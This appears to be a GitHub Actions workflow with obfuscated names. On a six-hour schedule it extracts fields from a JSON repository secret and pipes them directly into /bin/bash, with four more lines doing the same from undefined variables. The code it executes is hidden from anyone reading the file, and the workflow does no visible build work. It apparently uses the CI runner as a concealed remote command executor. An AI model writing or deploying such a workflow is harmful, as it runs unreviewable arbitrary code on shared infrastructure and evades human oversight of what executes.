name: moguangmin1989
on:
  workflow_dispatch:
  schedule:
    - cron: '56 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: moguangmin1989
        env:
          ceqw0778: ${{ secrets.ceqw0778 }}
        run: |
          echo $ceqw0778 | jq -r .uprl797 | /bin/bash
          echo $vefas432 | jq -r .kbdu0 | /bin/bash
          echo $vqu0 | jq -r .pgr955 | /bin/bash
          echo $bfxi0818 | jq -r .gwfvf49419 | /bin/bash
          echo $ukyi7 | jq -r .njtt0553 | /bin/bash

